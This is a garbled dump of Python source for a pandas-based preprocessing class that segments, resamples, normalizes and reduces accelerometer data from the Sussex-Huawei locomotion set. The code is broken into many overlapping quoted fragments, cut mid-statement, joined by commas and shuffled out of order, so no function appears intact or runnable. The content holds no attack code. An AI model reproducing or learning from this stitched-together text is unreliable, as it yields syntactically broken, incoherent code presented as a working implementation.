data[~not_outliers].index data.drop(index_names, inplace=True) 
old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index)", "vector and data matrix. :param labels: :param data: :return: \"\"\" try: if data", "data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns", "overrides import overrides import traceback import os import pandas from sklearn.decomposition import PCA", "def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series. :param", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features", "in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind]", "Remove rows that have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode:", "run @0.95 for classical approach via TS Fresh )[:-1] return data @overrides def", "'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)", "chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. Ensure index", ":return: \"\"\" try: data = None for ind in range(len(data_segments)): if data is", "a data set. 
:param data: :param columns: :return: \"\"\" try: if data is", "data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length =", "data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind in", "replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN',", "Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq)", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data,", "print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "import traceback import os import pandas from sklearn.decomposition import PCA import numpy class", "for classical approach via TS Fresh )[:-1] return data @overrides def training_split_process(self, data,", "= segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError):", "threshold = None): \"\"\" Removes outlieres either based on quantile or a threshold", "run @0.95 for classical approach via TS Fresh )[:-2] #Test data_test = 
self.de_segment_data(data_test_segments,", "# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced", "1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7 lines", "~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs']", "try: if data is None or column is None or unit is None:", "labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for", "= self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len", ":param selected_columns: :param axis: :return: \"\"\" try: data = None for ind in", "segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined =", "or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: #", "columns: :param quantile: :param threshold: :return: \"\"\" try: if data is None or", "@overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set. :param", "coordinate system. 
:param data: :param target_columns: :param mode: :param args: :return: \"\"\" try:", "= self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid =", "None): \"\"\" Resamples quantitative data. :param data: :param freq: :param mode: :return: \"\"\"", "of a fixed interval. :param data: :param mode: :param label_column: :param args: :return:", "system. :param data: :param target_columns: :param mode: :param args: :return: \"\"\" try: if", "selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid,", "std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len", "a global coordinate system. :param data: :param target_columns: :param mode: :param args: :return:", "segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0]", "meta_data): \"\"\" Apply all preprocessing steps necessary for inference. :param data: pandas.DataFrame :param", "for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than", "data.std() data = (data - data.mean()) / data.std() elif mean is not None", "isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode ==", "z-normalization to a data set. 
:param data: :param columns: :param mean: :param std:", ":param columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]'))", "for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment", "1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than", "from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import os import", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data):", "# https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index", "win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1,", "mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: 
data_valid_segments.append(road_segment) print('Resample') #Train for ind", "'mean' or mode is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum()", "valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment", "data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if", "theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column", "encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding function.", "import os import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def", "if data is None or replacement_mode is None or columns is None: raise", "segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope':", "raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return", "a data set. 
:param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series. :param data_segments: :param", "is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise", "data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center", "mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment,", "if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if", "if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names #", "#https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]])", "data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode == 'threshold': raise", "car_train_segments = self.segment_data(data_train, mode='labels', 
label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments:", "to a data set. :param data: :param columns: :return: \"\"\" try: if data", "== 'labels': # 1. Select all data with desired label value data_segments =", "segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError,", "os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from", "reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], #", "range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind", "len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]]", ":param labels: :param data: :return: \"\"\" try: if data is None or labels", "current run @0.95 for classical approach via TS Fresh )[:-1] return data @overrides", "os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary", "for target_label in args: selected_data = data[data[label_column] == target_label] # 2. Split by", "remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label. 
:param", "for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind,", "# Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq", "min_length_subsegements #3. Resample and aggregate data segments_combined = None for segment in min_length_subsegements:", "try: if data is None or replacement_mode is None or columns is None:", "(data - data.mean()) / data.std() elif mean is not None and std is", ":param freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try:", "@overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None): \"\"\"", "~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs']", "target_representation, data): \"\"\" Change representation of a data set. 
:param current_representation: :param target_representation:", "mean: :param std: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "@overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary for", "= self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach", "mean is None and std is None: if columns is not None: mean", "'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean = None, std =", "= pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data =", "= int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len *", "1. Select all data with desired label value data_segments = [] for target_label", "aggregate data segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index() segment.index", "return min_length_subsegements #3. 
Resample and aggregate data segments_combined = None for segment in", "try: if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms')", "mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95", "freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'],", "segment_length) if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments", "segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return", "mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test =", "#Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better", "None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not", 
"data[data[label_column] == target_label] # 2. Split by non-subsequent indices # Source for next", "data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test", "None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean':", "params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz =", "if mean is None and std is None: if columns is not None:", "pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides", ":param data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try: if data", "segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series based on a", "for ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data", "raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7 lines of", "unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None or replacement_mode is", "if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': 
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': #", "for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove", "exact_length = args[2] segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df,", "== 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if", "semantic segementation of a fixed interval. :param data: :param mode: :param label_column: :param", "return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length", "None or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "std = None): \"\"\" Apply z-normalization to a data set. 
:param data: :param", "if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data,", "\"\"\" try: if data is None or replacement_mode is None or unwanted_labels is", "None and std is None: if columns is not None: mean = data[columns].mean()", "\"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise", "data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data, labels) data =", "pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time", "axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data", "numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None):", "car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment)", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str):", "= data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() 
else: mean = data.mean()", "#acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label']", "data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for", "dimensionality reduction technique to a data set. :param data: :param mode: :param reduced_column_name:", "data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "= pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group", "pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index =", "@overrides def label_data(self, labels, data): \"\"\" Combines labels vector and data matrix. :param", "series based on a label column, semantic segementation of a fixed interval. 
:param", "data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data,", "print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data =", "#Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment", "replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode,", "axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs'", "data.min()) / (data.max() - data.min()) # to center around 0.0 substract 0.5 return", "[] split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except", "segment_length = args[0] aggregate = args[1] 
exact_length = args[2] segments_aggregated = [] split", "data, freq, mode = None): \"\"\" Resamples quantitative data. :param data: :param freq:", "replacement_value: any type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\"", "if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise", "isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'],", "label_column=None, args=None): \"\"\" Segements a time series based on a label column, semantic", "TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data", "def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set. 
:param data:", "not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if", "not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode", "data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels", "os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time", "encoding_function: :return: \"\"\" try: if data is None or mode is None or", "not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", "None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", ":param data: :param mode: :param label_column: :param args: :return: \"\"\" try: if data", "mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns,", "= meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data", "or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: 
self.logger.error(traceback.format_exc()) os._exit(2)", "Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all", "reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data,", "acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1,", "= pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data", "= data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode ==", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind,", "replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode", "data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile',", "data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind]", "1. Ensure index is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2.", "= pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. 
Remove segments that are too long or too", "data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None,", "long or too short after splitting min_length_subsegements = [] for segment in segments:", "= pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "== 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind", "os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set.", "= self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run", ":param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None", "if not isinstance(data, 
